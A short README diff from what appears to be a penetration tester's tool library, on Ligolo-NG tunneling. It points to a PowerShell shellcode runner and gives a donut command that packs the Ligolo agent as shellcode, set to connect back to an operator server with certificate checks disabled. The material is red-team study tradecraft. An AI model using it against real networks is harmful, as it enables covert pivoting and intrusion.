KashKat/ToolLibrary/README.md

 # Tunneling - Ligolo-NG

-We will use the powershell shellcode runner [here](https://raw.githubusercontent.com/Extravenger/OSEPlayground/refs/heads/main/04%20-%20Tunneling/ligolo.ps1).
+We will use the powershell shellcode runner in ToolLibrary/Tunnels/ligolo.ps1

 1. Make sure to convert agent.exe of ligolo to shellcode:
 - `donut -f 1 -o agent.bin -a 2 -p "-connect your-server:11601 -ignore-cert" -i agent.exe`